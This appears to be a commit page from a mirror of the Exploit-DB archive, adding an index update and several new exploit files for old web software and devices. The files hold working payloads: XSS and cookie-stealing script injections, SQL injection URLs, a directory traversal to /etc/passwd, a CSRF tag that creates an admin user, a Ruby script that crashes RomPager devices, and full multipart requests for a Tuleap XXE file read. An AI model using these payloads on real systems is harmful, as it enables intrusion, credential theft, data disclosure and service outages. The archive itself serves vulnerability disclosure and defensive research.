bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 10_30_2014

Browse source
This commit is contained in:
Offensive Security 2014-10-30 04:44:51 +00:00
parent 1709d70e04
commit 61f891edbd
21 changed files with 1592 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

22
files.csv
View file

@ -31573,7 +31573,7 @@ id,file,description,date,author,platform,type,port
35051,platforms/windows/remote/35051.txt,"Freefloat FTP Server Directory Traversal Vulnerability",2010-12-06,Pr0T3cT10n,windows,remote,0
35052,platforms/php/webapps/35052.txt,"Magento Server MAGMI Plugin - Remote File Inclusion (RFI)",2014-10-25,"Parvinder Bhasin",php,webapps,0
35055,platforms/windows/remote/35055.py,"Windows OLE - Remote Code Execution ""Sandworm"" Exploit (MS14-060)",2014-10-25,"Mike Czumak",windows,remote,0
35056,platforms/hardware/webapps/35056.txt,"Dell EqualLogic Storage - Remote File Inclusion",2014-10-25,"Mauricio Correa",hardware,webapps,0
35056,platforms/hardware/webapps/35056.txt,"Dell EqualLogic Storage - Directory Traversal",2014-10-25,"Mauricio Correa",hardware,webapps,0
35057,platforms/php/webapps/35057.py,"Creative Contact Form (Wordpress 0.9.7 and Joomla 2.0.0) - Shell Upload Vulnerability",2014-10-25,"Claudio Viviani",php,webapps,0
35058,platforms/bsd/dos/35058.c,"OpenBSD <= 5.5 - Local Kernel Panic",2014-10-25,nitr0us,bsd,dos,0
35059,platforms/ios/webapps/35059.txt,"File Manager 4.2.10 iOS - Code Execution Vulnerability",2014-10-25,Vulnerability-Lab,ios,webapps,0
@ -31594,9 +31594,29 @@ id,file,description,date,author,platform,type,port
35074,platforms/windows/local/35074.py,"Free WMA MP3 Converter 1.8 (.wav) - Buffer Overflow",2014-10-27,metacom,windows,local,0
35075,platforms/hardware/webapps/35075.txt,"CBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities",2014-10-27,LiquidWorm,hardware,webapps,0
35076,platforms/multiple/webapps/35076.py,"HP Operations Agent Remote XSS iFrame Injection",2014-10-27,"Matt Schmidt",multiple,webapps,383
35077,platforms/windows/local/35077.txt,"Filemaker Pro 13.03 & Advanced 12.04 - Login Bypass and Privilege Escalation",2014-10-27,"Giuseppe D'Amore",windows,local,0
35078,platforms/unix/remote/35078.rb,"Centreon SQL and Command Injection",2014-10-27,metasploit,unix,remote,80
35079,platforms/jsp/webapps/35079.txt,"Mulesoft ESB Runtime 3.5.1 - Privilege Escalation Vulnerability",2014-10-27,"Brandon Perry",jsp,webapps,8585
35080,platforms/php/webapps/35080.pl,"Incredible PBX 2.0.6.5.0 - Remote Command Execution",2014-10-27,"Simo Ben Youssef",php,webapps,80
35081,platforms/linux/dos/35081.txt,"Binary File Descriptor Library (libbfd) - Out-of-Bounds Crash",2014-10-27,"Michal Zalewski",linux,dos,0
35082,platforms/ios/webapps/35082.txt,"WebDisk+ 2.1 iOS - Code Execution Vulnerability",2014-10-27,Vulnerability-Lab,ios,webapps,1861
35083,platforms/ios/webapps/35083.txt,"Folder Plus 2.5.1 iOS - Persistent XSS Vulnerability",2014-10-27,Vulnerability-Lab,ios,webapps,0
35084,platforms/php/webapps/35084.txt,"WordPress Twitter Feed Plugin 'url' Parameter Cross Site Scripting Vulnerability",2010-12-07,"John Leitch",php,webapps,0
35085,platforms/cgi/webapps/35085.txt,"WWWThread 5.0.8 Pro 'showflat.pl' Cross Site Scripting Vulnerability",2010-12-09,"Aliaksandr Hartsuyeu",cgi,webapps,0
35086,platforms/multiple/dos/35086.rb,"Allegro RomPager 4.07 UPnP HTTP Request Remote Denial of Service Vulnerability.",2010-12-08,"Ricky-Lee Birtles",multiple,dos,0
35087,platforms/php/webapps/35087.txt,"net2ftp 0.98 (stable) 'admin1.template.php' Local and Remote File Include Vulnerabilities",2010-12-09,"Marcin Ressel",php,webapps,0
35088,platforms/php/webapps/35088.txt,"PHP State 'id' Parameter SQL Injection Vulnerability",2010-12-09,jos_ali_joe,php,webapps,0
35089,platforms/php/webapps/35089.txt,"Joomla Jeformcr 'id' Parameter SQL Injection Vulnerability",2010-12-09,FL0RiX,php,webapps,0
35090,platforms/php/webapps/35090.txt,"JExtensions Property Finder Component for Joomla! 'sf_id' Parameter SQL Injection Vulnerability",2010-12-10,FL0RiX,php,webapps,0
35091,platforms/php/webapps/35091.txt,"ManageEngine EventLog Analyzer 6.1 Multiple Cross Site Scripting Vulnerabilities",2010-12-10,"Rob Kraus",php,webapps,0
35092,platforms/multiple/remote/35092.html,"Helix Server 14.0.1.571 Administration Interface Cross Site Request Forgery Vulnerability",2010-12-10,"John Leitch",multiple,remote,0
35093,platforms/cgi/webapps/35093.txt,"BizDir v.05.10 'f_srch' Parameter Cross Site Scripting Vulnerability",2010-12-10,"Aliaksandr Hartsuyeu",cgi,webapps,0
35094,platforms/php/webapps/35094.txt,"slickMsg 0.7-alpha 'top.php' Cross Site Scripting Vulnerability",2010-12-10,"Aliaksandr Hartsuyeu",php,webapps,0
35095,platforms/linux/remote/35095.txt,"Mozilla Firefox/Thunderbird/SeaMonkey Multiple HTML Injection Vulnerabilities",2010-12-09,"Yosuke Hasegawa",linux,remote,0
35096,platforms/php/webapps/35096.txt,"Joomla! 'com_mailto' Component Multiple Cross Site Scripting Vulnerabilities",2010-12-10,MustLive,php,webapps,0
35097,platforms/php/webapps/35097.txt,"Joomla Redirect Component 1.5.19 'com_redirect' Local File Include Vulnerability",2010-12-13,jos_ali_joe,php,webapps,0
35098,platforms/php/webapps/35098.txt,"Enalean Tuleap 7.4.99.5 - Blind SQL Injection",2014-10-28,Portcullis,php,webapps,80
35099,platforms/php/webapps/35099.txt,"Enalean Tuleap 7.2 - XXE File Disclosure",2014-10-28,Portcullis,php,webapps,80
35100,platforms/php/webapps/35100.txt,"Enalean Tuleap 7.4.99.5 - Remote Command Execution",2014-10-28,Portcullis,php,webapps,80
35101,platforms/windows/local/35101.rb,"Windows TrackPopupMenu Win32k NULL Pointer Dereference",2014-10-28,metasploit,windows,local,0
35102,platforms/php/webapps/35102.py,"vBulletin Tapatalk - Blind SQL Injection",2014-10-28,tintinweb,php,webapps,80

Can't render this file because it is too large.

9
platforms/cgi/webapps/35085.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45303/info
WWWThread is prone to a cross-site-scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
WWWThread 5.0.8 Pro is vulnerable; other versions may also be affected.
http://www.example.com/cgi-bin/forum/showflat.pl?Cat=&Board=forum&Number=111&page=0&view="<XSS>expanded&sb=1&part=all&vc=1

9
platforms/cgi/webapps/35093.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45342/info
BizDir is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
BizDir v.05.10 is vulnerable; other versions may also be affected.
http://www.example.com/cgi-bin/bizdir/bizdir.cgi?f_mode=srch& f_srch=<XSS inj>&f_srch_mode=SOME&f_start_at=1

13
platforms/linux/remote/35095.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/45353/info
Mozilla Firefox, SeaMonkey, and Thunderbird are prone to multiple HTML-injection vulnerabilities.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
This issue is fixed in:
Firefox 3.6.13
Firefox 3.5.16
SeaMonkey 2.0.11
x-mac-farsi exploit: <meta charset="x-mac-farsi">?script ?alert(1)//?/script ?

24
platforms/multiple/dos/35086.rb Executable file
View file

@ -0,0 +1,24 @@
source: http://www.securityfocus.com/bid/45309/info
Allegro RomPager is prone to a remote denial-of-service vulnerability.
Successfully exploiting this issue allows remote attackers to reboot affected devices, resulting in a denial-of-service condition.
require 'net/https'
url = URI.parse("http://IP/")
data = nil
headers = {
"Host" => "IP",
"Authorization" => "Basic
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
}
res = Net::HTTP.start(url.host, url.port) do |http|
http.use_ssl = false
http.send_request("GET", url.path, data, headers)
end
puts res.body

13
platforms/multiple/remote/35092.html Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/45340/info
Helix Server is prone to a cross-site request-forgery vulnerability.
An attacker can exploit this issue to perform unauthorized actions by enticing a logged-in user to visit a malicious site.
Helix Server 14.0.1.571 is vulnerable; other versions may also be affected.
<html>
<body>
<img src="http://www.example.com/admin/auth.adduser.html?respage=config_results.nc.html&name=new_admin&pass=Password1&realm=TESTBOX.AdminRealm" />
</body>
</html>

9
platforms/php/webapps/35084.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45294/info
The Twitter Feed Plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Twitter Feed 0.3.1 is vulnerable; other versions may also be affected.
http://www.example.com/wordpress/wp-content/plugins/wp-twitter-feed/magpie/scripts/magpie_debug.php?url=%3Cscript%3Ealert(0)%3C/script%3E

9
platforms/php/webapps/35087.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45312/info
The 'net2ftp' program is prone to a local file-include vulnerability and a remote file-include vulnerability because the application fails to sufficiently sanitize user-supplied input.
An attacker can exploit these issues to obtain sensitive information; other attacks are also possible.
net2ftp 0.98 stable is vulnerable; other versions may also be affected.
http://www.example.com/skins/mobile/admin1.template.php?net2ftp_globals[application_skinsdir]=evilevilevil

7
platforms/php/webapps/35088.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/45328/info
PHP State is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
http://www.example.com/state.php?id=37+union+select+1,2,3,4,5,6,7,concat_ws (0x3a,user(),database(),versi(),@version_compile_os),8,9,10,11- josalijoe -

7
platforms/php/webapps/35089.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/45329/info
Joomla Jeformcr is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_jeformcr&view=form&id=[SQLi]

7
platforms/php/webapps/35090.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/45333/info
JExtensions Property Finder is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_jesectionfinder&view=sectiondetail&sf_id=[EXPLOIT]

18
platforms/php/webapps/35091.txt Executable file
View file

@ -0,0 +1,18 @@
source: http://www.securityfocus.com/bid/45334/info
ManageEngine EventLog Analyzer is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
ManageEngine EventLog Analyzer 6.1 is vulnerable; other versions may also be affected.
https://www.example.com/pkg_edit.php?xml=olsrd.xml&id=%22/%3E%3Cscript%3Ealert%282%29;%3C/script%3E
https://www.example.com/pkg.php?xml=jailctl.xm%27l%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
https://www.example.com/status_graph.php?if=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
https://www.example.com/interfaces.php?if=wan%22%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E

9
platforms/php/webapps/35094.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45343/info
slickMsg is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
slickMsg 0.7-alpha is vulnerable; other versions may also be affected.
http://www.example.com/slickmsg/views/Thread/display/top.php?title=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E

8
platforms/php/webapps/35096.txt Executable file
View file

@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/45356/info
The 'com_mailto' component for Joomla! is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
" style="xss:expression(alert(document.cookie))
In fields: E-mail to, Sender, Your E-mail, Subject.

9
platforms/php/webapps/35097.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45364/info
The 'com_redirect' component for Joomla! is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.
Joomla Redirect 1.5.19 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?option=com_redirect&view=../../../../../../../../../etc/passwd%00

36
platforms/php/webapps/35098.txt Executable file
View file

@ -0,0 +1,36 @@
Vulnerability title: Tuleap <= 7.4.99.5 Authenticated Blind SQL Injection in Enalean Tuleap
CVE: CVE-2014-7176
Vendor: Enalean
Product: Tuleap
Affected version: 7.4.99.5 and earlier
Fixed version: 7.5
Reported by: Jerzy Kramarz
Details:
SQL injection has been found and confirmed within the software as an authenticated user. A successful attack could allow an authenticated attacker to access information such as usernames and password hashes that are stored in the database. The following URLs and parameters have been confirmed to suffer from SQL injections:
GET /plugins/docman/?group_id=100&id=16&action=search&global_txt=a<SQL Injection>&global_filtersubmit=Apply HTTP/1.1
Host: 192.168.56.108
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.56.108/plugins/docman/?group_id=100
Cookie: PHPSESSID=3pt0ombsmp0t9adujgrohv8mb6; TULEAP_session_hash=d51433e1f7c9b49079c0e5c511d64c96
Connection: keep-alive
Note: In order to exploit this vulnerability a attacker needs to be in position to access '/plugins/docman/' URN.
Further details at:
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-7176/
Copyright:
Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
Disclaimer:
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.

888
platforms/php/webapps/35099.txt Executable file
View file

@ -0,0 +1,888 @@
Vulnerability title: Tuleap <= 7.2 External XML Entity Injection in Enalean Tuleap
CVE: CVE-2014-7177
Vendor: Enalean
Product: Tuleap
Affected version: 7.2 and earlier
Fixed version: 7.4.99.5
Reported by: Jerzy Kramarz
Details:
A multiple XML External Entity Injection has been found and confirmed within the software as an authenticated user. Successful attack could allow an authenticated attacker to access local system files. The following example vectors can be used as PoC to confirm the vulnerability.
Vulnerability 1:
1) Upload a XXE using the following request:
POST /plugins/tracker/?group_id=102&func=create HTTP/1.1
Host: [ip]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://[ip]/plugins/tracker/?group_id=102&func=create
Cookie: PHPSESSID=ujjrs6r6mssqn5gd5j83cmner4; TULEAP_session_hash=4a8075ce16e338b4015405cfa2816319
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------25777276834778
Content-Length: 10561
-----------------------------25777276834778
Content-Disposition: form-data; name="group_id"
102
-----------------------------25777276834778
Content-Disposition: form-data; name="func"
docreate
-----------------------------25777276834778
Content-Disposition: form-data; name="group_id_template"
100
-----------------------------25777276834778
Content-Disposition: form-data; name="tracker_new_prjname"
Commencez à taper
-----------------------------25777276834778
Content-Disposition: form-data; name="create_mode"
xml
-----------------------------25777276834778
Content-Disposition: form-data; name="tracker_new_xml_file"; filename="xee.xml"
Content-Type: text/xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE str [<!ENTITY xxe SYSTEM "/etc/passwd">]>
<tracker instantiate_for_new_projects="0">
<name>123&xxe;</name>
<item_name>e123&xxe;</item_name>
<description>123&xxe;</description>
<cannedResponses/>
<formElements>
<formElement type="file" ID="F1" rank="0" use_it="0">
<name>attachment</name>
<label>Attachments</label>
</formElement>
<formElement type="text" ID="F2" rank="2" use_it="0">
<name>details</name>
<label>Original Submission</label>
<description>A full description of the artifact&xxe;</description>
<properties rows="7" cols="60"/>
</formElement>
<formElement type="string" ID="F3" rank="4" use_it="0" required="1">
<name>summary</name>
<label>Summary</label>
<description>One line description of the artifact&xxe;</description>
<properties maxchars="150" size="60"/>
</formElement>
<formElement type="tbl" ID="F4" rank="6" use_it="0">
<name>cc</name>
<label>CC</label>
<properties hint="Type in a search term"/>
<bind type="static" is_rank_alpha="0"/>
</formElement>
<formElement type="sb" ID="F7" rank="12" use_it="0">
<name>status_id</name>
<label>Status</label>
<description>Artifact Status</description>
<bind type="static" is_rank_alpha="0">
<items>
<item ID="F7-V0" label="Open">
<description>The artifact has been submitted&xxe;</description>
</item>
<item ID="F7-V1" label="Closed">
<description>The artifact is no longer active. See the Resolution field for details on how it was resolved.&xxe;</description>
</item>
</items>
</bind>
</formElement>
<formElement type="sb" ID="F8" rank="14" use_it="0">
<name>assigned_to</name>
<label>Assigned to</label>
<description>Who is in charge of solving the artifact&xxe;</description>
<bind type="users">
<items>
<item label="group_members"/>
</items>
</bind>
</formElement>
<formElement type="sb" ID="F11" rank="20" use_it="0">
<name>category_id</name>
<label>Category</label>
<description>Generally correspond to high level modules or functionalities of your software (e.g. User interface, Configuration Manager, Scheduler, Memory Manager...)</description>
<bind type="static" is_rank_alpha="0"/>
</formElement>
<formElement type="sb" ID="F12" rank="22" use_it="0">
<name>severity</name>
<label>Priority</label>
<description>How quickly the artifact must be completed</description>
<bind type="static" is_rank_alpha="0">
<items>
<item ID="F12-V0" label="1 - Lowest"/>
<item ID="F12-V1" label="2"/>
<item ID="F12-V2" label="3"/>
<item ID="F12-V3" label="4"/>
<item ID="F12-V4" label="5 - Medium"/>
<item ID="F12-V5" label="6"/>
<item ID="F12-V6" label="7"/>
<item ID="F12-V7" label="8"/>
<item ID="F12-V8" label="9 - Highest"/>
</items>
<decorators>
<decorator REF="F12-V0" r="255" g="255" b="204"/>
<decorator REF="F12-V1" r="255" g="255" b="102"/>
<decorator REF="F12-V2" r="255" g="204" b="0"/>
<decorator REF="F12-V3" r="255" g="153" b="0"/>
<decorator REF="F12-V4" r="255" g="102" b="0"/>
<decorator REF="F12-V5" r="255" g="51" b="0"/>
<decorator REF="F12-V6" r="204" g="51" b="0"/>
<decorator REF="F12-V7" r="153" g="0" b="0"/>
<decorator REF="F12-V8" r="51" g="0" b="0"/>
</decorators>
</bind>
</formElement>
<formElement type="sb" ID="F13" rank="24" use_it="0">
<name>stage&xxe;</name>
<label>Stage&xxe;</label>
<description>Stage in the life cycle of the artifact&xxe;</description>
<bind type="static" is_rank_alpha="0">
<items>
<item ID="F13-V0" label="New">
<description>The artifact has just been submitted</description>
</item>
<item ID="F13-V1" label="Analyzed">
<description>The cause of the artifact has been identified and documented</description>
</item>
<item ID="F13-V2" label="Accepted">
<description>The artifact will be worked on.</description>
</item>
<item ID="F13-V3" label="Under Implementation">
<description>The artifact is being worked on.</description>
</item>
<item ID="F13-V4" label="Ready for Review">
<description>Updated/Created non-software work product (e.g. documentation) is ready for review and approval.</description>
</item>
<item ID="F13-V5" label="Ready for Test">
<description>Updated/Created software is ready to be included in the next build</description>
</item>
<item ID="F13-V6" label="In Test">
<description>Updated/Created software is in the build and is ready to enter the test phase</description>
</item>
<item ID="F13-V7" label="Approved">
<description>The artifact fix has been succesfully tested. It is approved and awaiting release.</description>
</item>
<item ID="F13-V8" label="Declined">
<description>The artifact was not accepted.</description>
</item>
<item ID="F13-V9" label="Done">
<description>The artifact is closed.</description>
</item>
</items>
</bind>
</formElement>
</formElements>
<semantics>
<semantic type="tooltip"/>
</semantics>
<reports>
<report is_default="0">
<name>Default</name>
<description>The system default artifact report</description>
<criterias/>
<renderers>
<renderer type="table" rank="0" chunksz="15" multisort="15">
<name>Results</name>
<columns/>
</renderer>
<renderer type="plugin_graphontrackersv5" rank="1">
<name>Default</name>
<description>Graphic Report By Default For Support Requests</description>
<charts/>
</renderer>
</renderers>
</report>
</reports>
<workflow/>
<permissions>
<permission scope="field" REF="F1" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
<permission scope="field" REF="F1" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
<permission scope="field" REF="F1" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
<permission scope="field" REF="F2" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
<permission scope="field" REF="F2" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
<permission scope="field" REF="F2" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
<permission scope="field" REF="F3" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
<permission scope="field" REF="F3" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
<permission scope="field" REF="F3" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
<permission scope="field" REF="F4" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
<permission scope="field" REF="F4" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
<permission scope="field" REF="F4" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
<permission scope="field" REF="F7" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
<permission scope="field" REF="F7" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
<permission scope="field" REF="F7" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
<permission scope="field" REF="F8" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
<permission scope="field" REF="F8" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
<permission scope="field" REF="F8" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
<permission scope="field" REF="F11" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
<permission scope="field" REF="F11" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
<permission scope="field" REF="F11" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
<permission scope="field" REF="F12" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
<permission scope="field" REF="F12" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
<permission scope="field" REF="F12" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
<permission scope="field" REF="F13" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
<permission scope="field" REF="F13" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
<permission scope="field" REF="F13" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
<permission scope="tracker" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_ACCESS_FULL"/>
</permissions>
</tracker>
-----------------------------25777276834778
Content-Disposition: form-data; name="name"
123
-----------------------------25777276834778
Content-Disposition: form-data; name="description"
123
-----------------------------25777276834778
Content-Disposition: form-data; name="itemname"
e123
-----------------------------25777276834778
Content-Disposition: form-data; name="Create"
Créer
-----------------------------25777276834778--
2) The server will respond giving back a 'tracker number' in the response. The response contain link to specific "tracker" which will be similar to the following:
https://[ip]/plugins/tracker/?group_id=102&tracker=11
3) Using retrieved tracker number, a XXE can be trigerred by visiting the following URL:
https://[ip]/plugins/tracker/?tracker=11&func=admin-formElements
Vulnerability 2
1) Upload a XXE using the following request:
<
POST /plugins/tracker/?group_id=102&func=create HTTP/1.1
Host: [ip]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://[ip]/plugins/tracker/?group_id=102&func=create
Cookie: PHPSESSID=ujjrs6r6mssqn5gd5j83cmner4; TULEAP_session_hash=e619b58add92383b3647ee5ba68c4a79
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------12077103611061
Content-Length: 25588
-----------------------------12077103611061
Content-Disposition: form-data; name="group_id"
102
-----------------------------12077103611061
Content-Disposition: form-data; name="func"
docreate
-----------------------------12077103611061
Content-Disposition: form-data; name="group_id_template"
100
-----------------------------12077103611061
Content-Disposition: form-data; name="tracker_new_prjname"
Commencez à taper
-----------------------------12077103611061
Content-Disposition: form-data; name="create_mode"
xml
-----------------------------12077103611061
Content-Disposition: form-data; name="tracker_new_xml_file"; filename="tracker_bugs.xml"
Content-Type: text/xml
<?xml version="1.0"?>
<!DOCTYPE str [<!ENTITY xxe SYSTEM "/etc/passwd">]>
<tracker instantiate_for_new_projects="0">
<name>Bugs</name>
<item_name>bug</item_name>
<description>Bugs Tracker</description>
<cannedResponses/>
<formElements>
<formElement type="column" ID="F1" rank="120">
<name>column8</name>
<label>Column Top 1</label>
<formElements>
<formElement type="aid" ID="F2" rank="0">
<name>artifact_id</name>
<label>Artifact ID</label>
<description>Unique artifact identifier&xxe;</description>
</formElement>
<formElement type="subby" ID="F3" rank="1">
<name>submitted_by</name>
<label>Submitted by</label>
<description>User who originally submitted the artifact&xxe;</description>
</formElement>
</formElements>
</formElement>
<formElement type="column" ID="F4" rank="121">
<name>column10&xxe;</name>
<label>Column Top 2&xxe;</label>
<formElements>
<formElement type="lud" ID="F5" rank="0">
<name>last_update_date</name>
<label>Last Modified On&xxe;</label>
<description>Date and time of the latest modification in an artifact&xxe;</description>
</formElement>
<formElement type="subon" ID="F6" rank="2">
<name>open_date&xxe;</name>
<label>Submitted on&xxe;</label>
<description>Date and time for the initial artifact submission&xxe;</description>
</formElement>
</formElements>
</formElement>
<formElement type="fieldset" ID="F7" rank="132" required="1">
<name>fieldset_1</name>
<label>Details</label>
<description>fieldset_default_desc_key</description>
<formElements>
<formElement type="string" ID="F8" rank="0" required="1">
<name>summary</name>
<label>Summary</label>
<description>One line description of the artifact</description>
<properties maxchars="150" size="61"/>
</formElement>
<formElement type="text" ID="F9" rank="7">
<name>details</name>
<label>Original Submission</label>
<description>A full description of the artifact</description>
<properties rows="7" cols="80"/>
</formElement>
<formElement type="column" ID="F10" rank="8">
<name>column10</name>
<label>Column Details 1</label>
<formElements>
<formElement type="sb" ID="F11" rank="0">
<name>severity</name>
<label>Severity</label>
<description>Impact of the artifact on the system (Critical, Major,...)</description>
<bind type="static" is_rank_alpha="0">
<items>
<item ID="F11-V0" label="1 - Ordinary"/>
<item ID="F11-V1" label="2"/>
<item ID="F11-V2" label="3"/>
<item ID="F11-V3" label="4"/>
<item ID="F11-V4" label="5 - Major"/>
<item ID="F11-V5" label="6"/>
<item ID="F11-V6" label="7"/>
<item ID="F11-V7" label="8"/>
<item ID="F11-V8" label="9 - Critical"/>
</items>
<decorators>
<decorator REF="F11-V0" r="255" g="255" b="102"/>
